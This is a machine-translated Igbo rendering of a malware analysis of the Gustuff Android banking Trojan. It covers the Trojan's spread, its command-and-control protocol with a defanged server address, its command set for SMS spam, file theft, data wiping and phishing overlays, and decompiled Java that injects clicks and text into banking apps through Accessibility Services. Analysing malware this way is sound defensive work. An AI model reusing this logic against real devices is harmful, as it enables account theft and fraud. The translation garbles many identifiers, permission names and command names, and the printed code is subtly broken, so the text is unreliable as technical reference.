Naanị ụbọchị ọzọ Group-IB banyere ọrụ nke mobile Android Trojan Gustuff. Ọ na-arụ ọrụ naanị n'ahịa mba ụwa, na-awakpo ndị ahịa nke nnukwu ụlọ akụ mba ofesi 100, ndị na-eji obere akpa crypto 32 mobile, yana nnukwu akụrụngwa e-commerce. Mana onye nrụpụta Gustuff bụ cybercriminal na-asụ Russian n'okpuru aha njirimara Bestoffer. Ruo n'oge na-adịbeghị anya, ọ toro Trojan ya dị ka "ihe dị mkpa maka ndị nwere ihe ọmụma na ahụmahụ."
Ọkachamara nyocha koodu ọjọọ na Group-IB Ivan Pisarev na nyocha ya, ọ na-ekwu n'ụzọ zuru ezu banyere otú Gustuff si arụ ọrụ na ihe ize ndụ ya.
Ọnye na-bụ Gustuff na-achụ nta?
Gustuff bụ nke ọgbọ ọhụrụ nke malware nwere ọrụ akpaaka zuru oke. Dị ka onye nrụpụta si kwuo, Trojan abụrụla ụdị ọhụrụ AndyBot malware, nke kemgbe ọnwa Nọvemba 2017 na-awakpo ekwentị gam akporo na-ezu ohi ego site na ụdị weebụ phishing na-eme ka ọ bụrụ ngwa mkpanaka nke ụlọ akụ mba ụwa a ma ama na usoro ịkwụ ụgwọ. Bestoffer kọrọ na ọnụahịa mgbazinye Gustuff Bot bụ $800 kwa ọnwa.
Nnyocha nke ihe nlele Gustuff gosiri na Trojan nwere ike ịchụ ndị ahịa na-eji ngwa mkpanaka nke nnukwu ụlọ akụ, dị ka Bank of America, Bank of Scotland, JP Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, yana Bitcoin. obere akpa crypto. BitPay, Cryptopay, Coinbase, wdg.
Emebere mbụ dị ka Trojan ụlọ akụ ama ama, na ụdị ya ugbu a Gustuff agbasawanyela ndepụta nke ebumnuche ndị nwere ike ịwakpo. Na mgbakwunye na ngwa gam akporo maka ụlọ akụ, ụlọ ọrụ fintech na ọrụ crypto, Gustuff bụ maka ndị na-eji ngwa ahịa, ụlọ ahịa n'ịntanetị, usoro ịkwụ ụgwọ na ndị ozi ozugbo. Karịsịa, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut na ndị ọzọ.
Ebe ntinye: ngụkọta oge maka ọrịa oke
A mara Gustuff site na vector nke “kpochapụwo” nke ịbanye na ekwentị gam akporo gam akporo site na nzipu ozi SMS nwere njikọ APK. Mgbe ngwaọrụ gam akporo bu Trojan n'iwu nke ihe nkesa ahụ, Gustuff nwere ike gbasaa site na nchekwa data kọntaktị nke ekwentị nje ma ọ bụ site na nchekwa data nkesa. Emebere arụmọrụ Gustuff maka ọrịa oke na oke ego nke azụmahịa nke ndị na-arụ ya - ọ nwere ọrụ pụrụ iche nke “mejupụta akpaaka” n'ime ngwa ụlọ akụ ekwentị ziri ezi na obere akpa crypto, nke na-enye gị ohere ịgbatị ma bulie izu ohi ego.
Nnyocha nke Trojan gosiri na arụ ọrụ autofill na-arụ ọrụ n'ime ya site na iji Ọrụ Accessibility, ọrụ maka ndị nwere nkwarụ. Gustuff abụghị Trojan mbụ na-aga nke ọma na-agafe nchebe megide mmekọrịta yana ihe windo nke ngwa ndị ọzọ na-eji ọrụ gam akporo a. Agbanyeghị, iji ọrụ nnweta yana nchikota ya na ihe mkpuchi ụgbọ ala ka dị ụkọ.
Mgbe nbudata na ekwentị onye ahụ metụtara, Gustuff, na-eji ọrụ nnweta, na-enwe ike imekọrịta ihe na windo nke ngwa ndị ọzọ (banking, cryptocurrency, yana ngwa maka ịzụ ahịa n'ịntanetị, ozi, wdg), na-eme ihe ndị dị mkpa maka ndị na-awakpo. . Dịka ọmụmaatụ, na iwu nke ihe nkesa, Trojan nwere ike pịa bọtịnụ ma gbanwee ụkpụrụ nke ederede ederede na ngwa ụlọ akụ. Iji usoro ọrụ nnweta na-enye Trojan ohere ịgafe usoro nchekwa nke ụlọ akụ na-eji emegide Trojans mkpanaka ọgbọ gara aga, yana mgbanwe na amụma nchekwa nke Google mebere na ụdị Android OS ọhụrụ. Ya mere, Gustuff "maara otu" iji gbanyụọ nchedo Google: dị ka onye edemede si kwuo, ọrụ a na-arụ ọrụ na 70% nke ikpe.
Gustuff nwekwara ike igosipụta ngosi PUSH adịgboroja nwere akara ngosi nke ngwa mkpanaka ziri ezi. Onye ọrụ ahụ pịa ọkwa PUSH wee hụ windo phishing ebudatara na sava ahụ, ebe ọ na-abanye na kaadị akụ achọrọ ma ọ bụ data obere akpa crypto. N'ọnọdụ Gustuff ọzọ, a na-emepe ngwa nke gosipụtara ọkwa PUSH maka ya. N'okwu a, malware, n'okpuru iwu sitere na sava site na Ọrụ Nnweta, nwere ike mejupụta ụdị ngwa nke ụlọ akụ maka azụmahịa aghụghọ.
Ọrụ Gustuff gụnyekwara izipu ozi gbasara ngwaọrụ butere na sava ahụ, ikike ịgụ / zipu ozi SMS, izipu arịrịọ USSD, ịmalite Proxy SOCKS5, na-eso njikọ, izipu faịlụ (gụnyere nyocha foto nke akwụkwọ, nseta ihuenyo, foto) na ihe nkesa , tọgharịa ngwaọrụ na ntọala ụlọ ọrụ.
Nyocha malware
Tupu ịwụnye ngwa ọjọọ, Android OS na-egosi onye ọrụ windo nwere ndepụta ikike nke Gustuff rịọrọ:
A ga-arụnye ngwa a naanị mgbe ị nwetasịrị nkwenye onye ọrụ. Mgbe ịmalitere ngwa ahụ, Trojan ga-egosi onye ọrụ a window:
Mgbe nke a ga-ewepụ akara ngosi ya.
Gustuff juru n'ọnụ, dị ka onye odee si kwuo, site n'aka onye ngwugwu si FTT. Mgbe mmalite, ngwa a na-akpọtụrụ ihe nkesa CnC oge ụfọdụ iji nata iwu. Ọtụtụ faịlụ anyị nyochara jiri adreesị IP dị ka ihe nkesa na-achịkwa 88.99.171[.]105 (nke a anyị ga-egosipụta ya dị ka ).
Mgbe mmalite, usoro ihe omume na-amalite izipu ozi na ihe nkesa http://<%CnC%>/api/v1/get.php.
A na-atụ anya nzaghachi JSON n'ụdị a:
{
"results" : "OK",
"command":{
"id": "<%id%>",
"command":"<%command%>",
"timestamp":"<%Server Timestamp%>",
"params":{
<%Command parameters as JSON%>
},
},
}Oge ọ bụla enwetara ngwa a, ọ na-eziga ozi gbasara ngwaọrụ ndị butere ya. Egosiri usoro ozi n'okpuru. Ọ bụ ihe kwesịrị ịrịba ama na ubi full, mmezi, ngwa ọdịnala и ikike - nhọrọ, a ga-ezigara ya naanị ma ọ bụrụ na enyere iwu arịrịọ sitere na CnC.
{
"info":
{
"info":
{
"cell":<%Sim operator name%>,
"country":<%Country ISO%>,
"imei":<%IMEI%>,
"number":<%Phone number%>,
"line1Number":<%Phone number%>,
"advertisementId":<%ID%>
},
"state":
{
"admin":<%Has admin rights%>,
"source":<%String%>,
"needPermissions":<%Application needs permissions%>,
"accesByName":<%Boolean%>,
"accesByService":<%Boolean%>,
"safetyNet":<%String%>,
"defaultSmsApp":<%Default Sms Application%>,
"isDefaultSmsApp":<%Current application is Default Sms Application%>,
"dateTime":<%Current date time%>,
"batteryLevel":<%Battery level%>
},
"socks":
{
"id":<%Proxy module ID%>,
"enabled":<%Is enabled%>,
"active":<%Is active%>
},
"version":
{
"versionName":<%Package Version Name%>,
"versionCode":<%Package Version Code%>,
"lastUpdateTime":<%Package Last Update Time%>,
"tag":<%Tag, default value: "TAG"%>,
"targetSdkVersion":<%Target Sdk Version%>,
"buildConfigTimestamp":1541309066721
},
},
"full":
{
"model":<%Device Model%>,
"localeCountry":<%Country%>,
"localeLang":<%Locale language%>,
"accounts":<%JSON array, contains from "name" and "type" of accounts%>,
"lockType":<%Type of lockscreen password%>
},
"extra":
{
"serial":<%Build serial number%>,
"board":<%Build Board%>,
"brand":<%Build Brand%>,
"user":<%Build User%>,
"device":<%Build Device%>,
"display":<%Build Display%>,
"id":<%Build ID%>,
"manufacturer":<%Build manufacturer%>,
"model":<%Build model%>,
"product":<%Build product%>,
"tags":<%Build tags%>,
"type":<%Build type%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"line1number":<%phonenumber%>,
"iccid":<%Sim serial number%>,
"mcc":<%Mobile country code of operator%>,
"mnc":<%Mobile network codeof operator%>,
"cellid":<%GSM-data%>,
"lac":<%GSM-data%>,
"androidid":<%Android Id%>,
"ssid":<%Wi-Fi SSID%>
},
"apps":{<%List of installed applications%>},
"permission":<%List of granted permissions%>
} Na-echekwa data nhazi
Gustuff na-echekwa ozi dị mkpa na-arụ ọrụ na faịlụ mmasị. Aha faịlụ, yana aha paramita dị na ya, bụ nsonaazụ nke ịgbakọ nchikota MD5 site na eriri. 15413090667214.6.1ebe - aha mbụ-uru. Nkọwa Python nke ọrụ ọgbọ aha:
nameGenerator(input):
output = md5("15413090667214.6.1" + input)
Na ihe na-esonụ anyị ga-egosi ya dị ka aha Generator(ntinye).
Ya mere aha faịlụ mbụ bụ: aha Generator("API_SERVER_LIST"), ọ nwere ụkpụrụ nwere aha ndị a:
| Aha mgbanwe | uru |
|---|---|
| aha Generator("API_SERVER_LIST") | Nwere ndepụta adreesị CnC n'ụdị nhazi. |
| Onye na-emepụta aha ("API_SERVER_URL") | Nwere adreesị CnC. |
| Onye na-emepụta aha ("SMS_UPLOAD") | Edobere ọkọlọtọ na ndabara. Ọ bụrụ na atọrọ ọkọlọtọ, na-eziga ozi SMS na CnC. |
| Onye na-emepụta aha ("SMS_ROOT_NUMBER") | Nọmba ekwentị nke a ga-eziga ozi SMS nke ngwaọrụ nje butere na ya. Ndabere bụ efu. |
| Onye na-emepụta aha ("SMS_ROOT_NUMBER_RESEND") | A na-ehichapụ ọkọlọtọ na ndabara. Ọ bụrụ arụnyere, mgbe ngwaọrụ butere enwetara SMS, a ga-eziga ya na nọmba mgbọrọgwụ. |
| Onye na-emepụta aha ("DEFAULT_APP_SMS") | A na-ehichapụ ọkọlọtọ na ndabara. Ọ bụrụ na edobere ọkọlọtọ a, ngwa a ga-ahazi ozi SMS na-abata. |
| Onye na-emepụta aha ("DEFAULT_ADMIN") | A na-ehichapụ ọkọlọtọ na ndabara. Ọ bụrụ na atọrọ ọkọlọtọ, ngwa a nwere ikike nchịkwa. |
| aha Generator("DEFAULT_ACCESSIBILITY") | A na-ehichapụ ọkọlọtọ na ndabara. Ọ bụrụ na atọrọ ọkọlọtọ, ọrụ na-eji Ọrụ nnweta na-arụ ọrụ. |
| Onye na-emepụta aha ("APPS_CONFIG") | Ihe JSON nwere ndepụta omume ndị a ga-emerịrị mgbe ewelitere mmemme nnweta metụtara otu ngwa. |
| Onye na-emepụta aha ("APPS_INSTALLED") | Na-echekwa ndepụta ngwa arụnyere na ngwaọrụ. |
| aha Generator("IS_FIST_RUN") | Atọgharịrị ọkọlọtọ na mbido mbụ. |
| Onye na-emepụta aha ("UNIQUE_ID") | Nwere ihe nchọpụta pụrụ iche. Emepụtara mgbe ewepụtara bot na nke mbụ. |
Modul maka nhazi iwu sitere na sava
Ngwa a na-echekwa adrees nke sava CnC n'ụdị nhazi nke etinyere ya Base85 ahịrị. Enwere ike ịgbanwe ndepụta nke sava CnC mgbe nnata nke iwu kwesịrị ekwesị, nke a ga-echekwa adreesị na faịlụ mmasị.
Na nzaghachi nye arịrịọ ahụ, ihe nkesa na-eziga iwu na ngwa ahụ. Ọ dị mma ịmara na ewepụtara iwu na parampat n'ụdị JSON. Ngwa nwere ike hazie iwu ndị a:
| otu | Nkowasi |
|---|---|
| malite mmalite | Malite izipu ozi SMS nke ngwaọrụ butere ọrịa natara na nkesa CnC. |
| Nkwụsị n'ihu | Kwụsị izipu ozi SMS nke ngwaọrụ nje butere na sava CnC. |
| ussdRun | Mezue arịrịọ USSD. Nọmba nke ịchọrọ ịrịọ arịrịọ USSD dị na mpaghara JSON "nọmba". |
| izipu SMS | Zipụ otu ozi SMS (ọ bụrụ na ọ dị mkpa, a na-ekewa ozi ahụ n'ime akụkụ). Dị ka paramita, iwu ahụ na-ewere ihe JSON nwere mpaghara "ka" - ebe njedebe na "ahụ" - ahụ nke ozi ahụ. |
| zipuSmsAb | Zipu ozi SMS (ọ bụrụ na ọ dị mkpa, a na-ekewa ozi ahụ n'ime akụkụ) nye onye ọ bụla nọ na listi kọntaktị nke ngwaọrụ nje ahụ. Oghere dị n'etiti izipu ozi bụ sekọnd iri. Ahụ nke ozi dị na JSON ubi "ahụ" |
| zipu SMSMass | Zipu ozi SMS (ọ bụrụ na ọ dị mkpa, a na-ekewa ozi ahụ n'ime akụkụ) na kọntaktị ndị akọwapụtara na paramita iwu. Oghere dị n'etiti izipu ozi bụ sekọnd iri. Dị ka paramita, iwu ahụ na-ewe usoro JSON (ubi "sms"), ihe ndị mejupụtara ya nwere mpaghara "ka" - nọmba ebe na "ahụ" - ahụ nke ozi ahụ. |
| mgbanwe nkesa | Iwu a nwere ike were uru ya na igodo “url” dị ka paramita - mgbe ahụ bot ga-agbanwe uru nke nameGenerator (“SERVER_URL”), ma ọ bụ “array” - mgbe ahụ bot ga-ede n'usoro ka aha Generator (“API_SERVER_LIST”) Ya mere, ngwa na-agbanwe adreesị nke sava CnC. |
| Nọmba nchịkwa | Emebere iwu ahụ ka ọ rụọ ọrụ na nọmba mgbọrọgwụ. Iwu ahụ na-anabata ihe JSON nwere paramita ndị a: “nọmba” — gbanwee aha Generator(“ROOT_NUMBER”) gaa na uru enwetara, “reend” — gbanwee nameGenerator(“SMS_ROOT_NUMBER_RESEND”), “sendId” — ziga na nameGenerator(“ROOT_NUMBER”) ) pụrụ iche ID. |
| update Ozi | Zipu ozi gbasara ngwaọrụ oria na ihe nkesa. |
| hichapụData | Ezubere iwu a ka ihichapụ data onye ọrụ. Dabere na aha ewepụtara ngwa a, ma a na-ehichapụ data kpamkpam site na iji ngwaọrụ reboot (onye ọrụ izizi), ma ọ bụ naanị data onye ọrụ ka ehichapụrụ (onye ọrụ nke abụọ). |
| socksMalite | Mepụta modul proxy. A na-akọwa ọrụ nke modul ahụ na ngalaba dị iche. |
| sọks kwụsị | Kwụsị proxy modul. |
| mepee njikọ | Soro njikọ ahụ. Njikọ ahụ dị na paramita JSON n'okpuru igodo "url". A na-eji "android.intent.action.VIEW" mepee njikọ ahụ. |
| buliteAllSms | Zipụ ozi SMS niile ngwaọrụ nwetara na nkesa. |
| bulite Foto niile | Ziga onyonyo sitere na ngwaọrụ butere na URL. URL ahụ na-abịa dị ka oke. |
| bulite faịlụ | Ziga faịlụ na URL site na ngwaọrụ nwere ọrịa. URL ahụ na-abịa dị ka oke. |
| bulite ọnụọgụ ekwentị | Zipu nọmba ekwentị site na ndetu kọntaktị gị na sava ahụ. Ọ bụrụ na anabatara uru ihe JSON nwere igodo “ab” dị ka paramita, ngwa a na-enweta ndepụta kọntaktị site na akwụkwọ ekwentị. Ọ bụrụ na enwetara ihe JSON nwere igodo “sms” dị ka paramita, ngwa a na-agụ ndepụta kọntaktị sitere na ndị zitere ozi SMS. |
| mgbanweArchive | Ngwa ahụ na-ebudata faịlụ site na adreesị nke na-abịa dị ka paramita site na iji igodo "url". A na-echekwa faịlụ ebudatara na aha "archive.zip". Ngwa ahụ ga-ewepụzi faịlụ ahụ, ma ọ bụrụ na ị na-eji paswọọdụ nchekwa nchekwa "b5jXh37gxgHBrZhQ4j3D". A na-echekwa faịlụ ndị a na-ewepụghị na ndekọ [nchekwa mpụga]/hgps. N'ime ndekọ a, ngwa ahụ na-echekwa fakes webụ (akọwara n'okpuru). |
| omume | Emebere iwu ahụ ka ọ rụọ ọrụ na Ọrụ Action, nke akọwara na ngalaba dị iche. |
| ule | Emeghị ihe ọ bụla. |
| download | Ezubere iwu a ka ibudata faịlụ site na sava dịpụrụ adịpụ wee chekwaa ya na ndekọ “Downloads”. URL na aha faịlụ na-abịa dị ka paramita, ubi n'ime ihe paramita JSON, n'otu n'otu: "url" na "FileAme". |
| wepụ | Na-ewepụ faịlụ na ndekọ "Downloads". Aha faịlụ na-abịa na paramita JSON nwere igodo "FileAme". Aha faịlụ ọkọlọtọ bụ "tmp.apk". |
| ngosi | Gosi ọkwa nwere nkọwa na ederede aha nke ihe nkesa njikwa kọwapụtara. |
Usoro iwu ngosi:
{
"results" : "OK",
"command":{
"id": <%id%>,
"command":"notification",
"timestamp":<%Server Timestamp%>,
"params":{
"openApp":<%Open original app or not%>,
"array":[
{"title":<%Title text%>,
"desc":<%Description text%>,
"app":<%Application name%>}
]
},
},
}Ozi nke faịlụ a na-enyocha na-eme ka ọ yitere na amamọkwa nke ngwa akọwapụtara n'ubi ahụ. ngwa. Ọ bụrụ na ubi uru mepee ngwa - N'ezie, mgbe a ngosi na-emeghe, ngwa kpọmkwem na ubi na-amalite ngwa. Ọ bụrụ na ubi uru mepee ngwa — Ụgha, mgbe ahụ:
- Window phishing ga-emepe, nke a na-ebudata ọdịnaya ya na ndekọ /hgps/
- Window phishing ga-emepe, nke a na-ebudata ọdịnaya ya na sava ahụ ?id=&app=
- Window phishing ga-emepe, ngbanwe dị ka kaadị Google Play, yana ohere itinye nkọwa kaadị.
Ngwa na-ezigara nsonaazụ iwu ọ bụla set_state.php dị ka ihe JSON n'ụdị a:
{
"command":
{
"command":<%command%>,
"id":<%command_id%>,
"state":<%command_state%>
}
"id":<%bot_id%>
}
Ọrụ Ọrụ
Ndepụta iwu nke usoro ngwa gụnyere edinam. Mgbe enwetara iwu, modul nhazi iwu na-enweta ọrụ a iji mezuo iwu agbatịkwuru. Ọrụ ahụ na-anabata ihe JSON dịka oke. Ọrụ ahụ nwere ike ime iwu ndị a:
1. PARAMS_ACTION - mgbe ị na-anata iwu dị otú ahụ, ọrụ ahụ na-ebu ụzọ na-enweta site na paramita JSON uru nke igodo Ụdị, nke nwere ike ịbụ nke a:
- ozi ozi - subcommand na-enweta uru site na igodo site na paramita JSON gụnyere adịghị mkpa. Ọ bụrụ na ọkọlọtọ bụ eziokwu, ngwa ahụ na-edobe ọkọlọtọ FLAG_ISOLATED_PROCESS gaa na ọrụ na-eji Ọrụ nnweta. N'ụzọ dị otú a, a ga-amalite ọrụ ahụ na usoro dị iche.
- mgbọrọgwụ - nata na zipu ozi gbasara mpio nke na-elekwasị anya ugbu a na ihe nkesa. Ngwa a na-enweta ozi site na iji klas AccessibilityNodeInfo.
- admin - rịọ ikike nchịkwa.
- egbu oge - kwụsịtụrụ Ọrụ Ọrụ maka ọnụọgụ milliseconds akọwapụtara na paramita maka igodo “data”.
- windows - zipu ndepụta mpio anya onye ọrụ.
- tinye - wụnye ngwa na ngwaọrụ nje. Aha ngwungwu ihe ndekọ aha dị na igodo “FileAme”. Ebe nchekwa ahụ n'onwe ya dị na ndekọ nbudata.
- zuru ụwa ọnụ – subcommand e bu n’obi ịnyagharịa site na mpio dị ugbu a:
- na Ndenye Settings menu
- azu
- ulo
- ka ngosi
- gaa na mpio ngwa mepere emepe nso nso a
- igba egbe - malite ngwa ahụ. Aha ngwa na-abịa dị ka oke site igodo data.
- ụda - gbanwee ọnọdụ ụda ka ọ gbachie nkịtị.
- Ị kpọghee ekwt - gbanye azụ azụ nke ihuenyo na ahụigodo ka ọ bụrụ nchapụta zuru oke. Ngwa a na-eji WakeLock arụ ọrụ a, na-akọwapụta eriri [ngwa ngwa]: INFO dị ka mkpado.
- ikike Overlay - anaghị emejuputa atumatu a (azịza nye mmezu iwu bụ {"ozi":"anaghị akwado"} ma ọ bụ {"ozi":"low sdk").
- mmegharị - anaghị emejuputa atumatu a (azịza nye mmezu iwu bụ {"ozi":"anaghị akwado"}ma ọ bụ {"ozi":" API dị ala"})
- ikikere - iwu a dị mkpa iji rịọ ikike maka ngwa ahụ. Agbanyeghị, arụghị ọrụ ajụjụ a, yabụ iwu enweghị isi. Ndepụta nke ikike a rịọrọ na-abịa dị ka usoro JSON nwere igodo "ikike". Ndepụta ọkọlọtọ:
- android.ikike.READ_PHONE_STATE
- android.ikwa.READ_CONTACTS
- android.ikike.CALL_PHONE
- android.ikike.NTATA_SMS
- android.ikike.SEND_SMS
- android.ikike.GỤKWUO_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- -emeghe - gosi windo phishing. Dabere na oke na-abịa site na sava ahụ, ngwa a nwere ike igosipụta windo phishing ndị a:
- Gosi windo phishing nke edere ọdịnaya ya na faịlụ na ndekọ /hgps/. A ga-ezigara nsonaazụ nke mmekọrịta onye ọrụ na windo /records.php
- Gosi windo phishing nke ebugoro ọdịnaya ya site na adreesị ahụ ?id=&app=. A ga-ezigara nsonaazụ nke mmekọrịta onye ọrụ na windo /records.php
- Gosi windo phishing nwogha ka kaadị Google Play.
- mmekọrịta - Emebere iwu ahụ ka iji AcessibilityService na-emekọrịta ihe na akụkụ windo nke ngwa ndị ọzọ. E tinyela ọrụ pụrụ iche na mmemme maka mmekọrịta. Ngwa a na-enyocha nwere ike imekọrịta na windo:
- Na-arụ ọrụ ugbu a. N'okwu a, oke nwere id ma ọ bụ ederede (aha) nke ihe ị ga-eji meekọrịta ihe.
- Onye ọrụ na-ahụ anya n'oge emechara iwu ahụ. Ngwa na-ahọrọ windo site na id.
Inweta ihe AccessibilityNodeInfo Maka ihe ndị nwere mmasị na mpio, ngwa ahụ, dabere na paramita, nwere ike ịrụ ọrụ ndị a:
- focus — setịpụ uche na ihe ahụ.
- click — pịa ihe.
- actionId - mee ihe site na ID.
- setText - gbanwee ederede ihe. Ịgbanwe ederede ga-ekwe omume n'ụzọ abụọ: mee ihe ACTION_SET_TEXT (ma ọ bụrụ na ụdị gam akporo nke ngwaọrụ nje ahụ dị obere karịa ma ọ bụ ha nhata LOLLIPOP), ma ọ bụ site n'itinye eriri na klipbọọdụ wee mado ya n'ime ihe (maka ụdị ochie). Enwere ike iji iwu a gbanwee data na ngwa ụlọ akụ.
2. PARAMS_ACTIONS - dị ka PARAMS_ACTION, naanị usoro iwu JSON na-abịarute.
Ọ dị ka ọtụtụ ndị mmadụ ga-enwe mmasị na ihe ọrụ nke imekọrịta ihe na windo nke ngwa ọzọ dị. Nke a bụ ka esi arụ ọrụ a na Gustuff:
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
int count = action.optInt("repeat", 1);
Iterator aiListIterator = ((Iterable)aiList).iterator();
int count = 0;
while(aiListIterator.hasNext()) {
Object ani = aiListIterator.next();
if(1 <= count) {
int index;
for(index = 1; true; ++index) {
if(action.has("focus")) {
if(((AccessibilityNodeInfo)ani).performAction(1)) {
++count;
}
}
else if(action.has("click")) {
if(((AccessibilityNodeInfo)ani).performAction(16)) {
++count;
}
}
else if(action.has("actionId")) {
if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
++count;
}
}
else if(action.has("setText")) {
customHeader ch = CustomAccessibilityService.a;
Context context = this.getApplicationContext();
String text = action.optString("setText");
if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
++count;
}
}
if(index == count) {
break;
}
}
}
((AccessibilityNodeInfo)ani).recycle();
}
res.addPropertyNumber("res", Integer.valueOf(count));
}Ọrụ nnọchi ederede:
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
boolean result;
if(Build$VERSION.SDK_INT >= 21) {
Bundle b = new Bundle();
b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
result = ani.performAction(0x200000, b); // ACTION_SET_TEXT
}
else {
Object clipboard = context.getSystemService("clipboard");
if(clipboard != null) {
((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
result = ani.performAction(0x8000); // ACTION_PASTE
}
else {
result = false;
}
}
return result;
}Ya mere, site na nhazi ziri ezi nke ihe nkesa na-achịkwa, Gustuff nwere ike mejupụta mpaghara ederede na ngwa ụlọ akụ wee pịa bọtịnụ dị mkpa iji mezue azụmahịa ahụ. Trojan adịghịdị mkpa ịbanye na ngwa ahụ - ezuru izipu iwu iji gosipụta ọkwa PUSH wee mepee ngwa ụlọ akụ arụnyere na mbụ. Onye ọrụ ahụ ga-enyocha onwe ya, mgbe nke ahụ gasịrị Gustuff ga-enwe ike ijupụta ụgbọ ala ahụ.
Modul nhazi ozi SMS
Ngwa ahụ na-arụnye onye na-ahụ maka mmemme maka ngwaọrụ butere ịnakwere ozi SMS. Ngwa a na-amụ nwere ike ịnata iwu n'aka onye na-arụ ọrụ, nke na-abata n'ime ahụ nke ozi SMS. Iwu na-abịa n'ụdị:
7!5=
Ngwa a na-achọ eriri na ozi SMS niile na-abata 7!5 =, Mgbe achọpụtara eriri, ọ na-ewepụta eriri ahụ site na Base64 na defet 4 wee mee iwu ahụ. Iwu ndị a yiri nke nwere CnC. A na-eziga nsonaazụ igbu ya na otu nọmba nke iwu si bịa. Ụdị nzaghachi:
7*5=
Nhọrọ, ngwa nwere ike izipu niile natara ozi na Root nọmba. Iji mee nke a, a ga-akọwarịrị nọmba mgbọrọgwụ na faịlụ mmasị na ọkọlọtọ redirection ozi ga-edozi. A na-eziga ozi SMS na nọmba onye mwakpo n'ụdị:
-
Ọzọkwa, nhọrọ, ngwa nwere ike izipu ozi na CnC. A na-ezigara ozi SMS na sava ahụ n'ụdị JSON:
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}Ọ bụrụ na edobere ọkọlọtọ Onye na-emepụta aha ("DEFAULT_APP_SMS") - ngwa ahụ kwụsịrị ịhazi ozi SMS ma kpochapụ ndepụta ozi mbata.
Modul proxy
Ngwa a na-amụ nwere modul Backconnect Proxy (nke a na-akpọkwa ya dị ka modul proxy), nke nwere klaasị dị iche nke gụnyere mpaghara static nwere nhazi. A na-echekwa data nhazi n'ụdị n'ụdị doro anya:
Omume niile nke proxy modul mere na-abanye na faịlụ. Iji mee nke a, ngwa dị na Nchekwa Mpụga na-emepụta ndekọ aha ya bụ "logs" (mpaghara ProxyConfigClass.logsDir na klas nhazi), nke echekwara faịlụ ndekọ. Nbanye na-eme na faịlụ nwere aha:
- isi.txt – ọrụ nke klas a na-akpọ CommandServer abanyela na faịlụ a. N'ime ihe na-esote, ịbanye eriri str n'ime faịlụ a ga-apụta dị ka mainLog(str).
- nnọkọ-.txt - faịlụ a na-echekwa data ndekọ metụtara otu nnọkọ proxy. N'ime ihe na-esote, ịbanye eriri str na faịlụ a ga-apụta dị ka sessionLog (str).
- nkesa.txt - A na-eji faịlụ a abanye data niile edere na faịlụ ndị akọwapụtara n'elu.
Ụdị data ndekọ:
[Eriri[], id[]]: log-string
Ewepughi na-eme n'oge arụ ọrụ nke modul Proxy na-abanyekwa na faịlụ. Iji mee nke a, ngwa ahụ na-ewepụta ihe JSON n'ụdị a:
{
"uncaughtException":<%short description of throwable%>
"thread":<%thread%>
"message":<%detail message of throwable%>
"trace": //Stack trace info
[
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
},
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
}
]
}Mgbe ahụ ọ na-atụgharị ya ka ọ bụrụ ihe nnọchianya eriri wee dekọọ ya.
A na-ewepụta modul proxy mgbe ọ natachara iwu kwekọrọ. Mgbe enwetara iwu ibido proxy modul, ngwa a na-amalite ọrụ akpọrọ Ọrụ Main, nke na-ahụ maka ijikwa ọrụ nke proxy modul - ịmalite na ịkwụsị ya.
Usoro mmalite ọrụ:
1. Na-amalite ngụ oge na-agba otu nkeji ma na-elele ọrụ nke modul Proxy. Ọ bụrụ na modul adịghị arụ ọrụ, ọ na-amalite ya.
Ọzọkwa mgbe ihe omume na-akpalite android.net.conn.CONNECTIVITY_CHANGE Ewepụtala modul proxy.
2. Ngwa a na-emepụta mkpọchi ịkpọte na oke PARTIAL_WAKE_LOCK ma jide ya. Nke a na-egbochi CPU ngwaọrụ ịbanye n'ọnọdụ ụra.
3. Na-amalite klaasị nhazi iwu nke modul Proxy, buru ụzọ banye ahịrị mainLog("mmalite ihe nkesa") и
Sava :: malite () onye ọbịa[], CommandPort[], proxyPort[]
ebe proxy_cnc, Command_port na proxy_port – parameters enwetara site na nhazi ihe nkesa proxy.
A na-akpọ klaasị nhazi iwu Njikọ Command. Ozugbo mmalite, na-eme omume ndị a:
4. Jikọọ na ProxyConfigClass.host: ProxyConfigClass.commandPort ma zipu data gbasara ngwaọrụ butere n'ebe ahụ n'ụdị JSON:
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}Ebee:
- id – njirimara, na-anwa inweta uru na mpaghara “id” site na faịlụ Mmasị Ekekọrịtara aha ya bụ “x”. Ọ bụrụ na enweghị ike ịnweta uru a, ọ na-ewepụta nke ọhụrụ. Ya mere, modul Proxy nwere njirimara nke ya, nke emepụtara n'otu aka ahụ na Bot ID.
- imei - IMEI nke ngwaọrụ. Ọ bụrụ na njehie mere n'oge usoro ịnweta uru, a ga-ede ozi ederede njehie kama mpaghara a.
- imsi — International Mobile Subscriber Identity nke ngwaọrụ. Ọ bụrụ na njehie mere n'oge usoro ịnweta uru, a ga-ede ozi ederede njehie kama mpaghara a.
- ihe nlereanya - Aha njedebe-onye ọrụ-ahụ anya maka ngwaahịa njedebe.
- emeputa - Onye na-emepụta ngwaahịa / ngwaike (Build.MANUFACTURER).
- androidVersion - eriri n'ụdị " (),"
- obodo - ọnọdụ ngwaọrụ ugbu a.
- partnerId bụ eriri efu.
- Aha ngwugwu - aha ngwugwu.
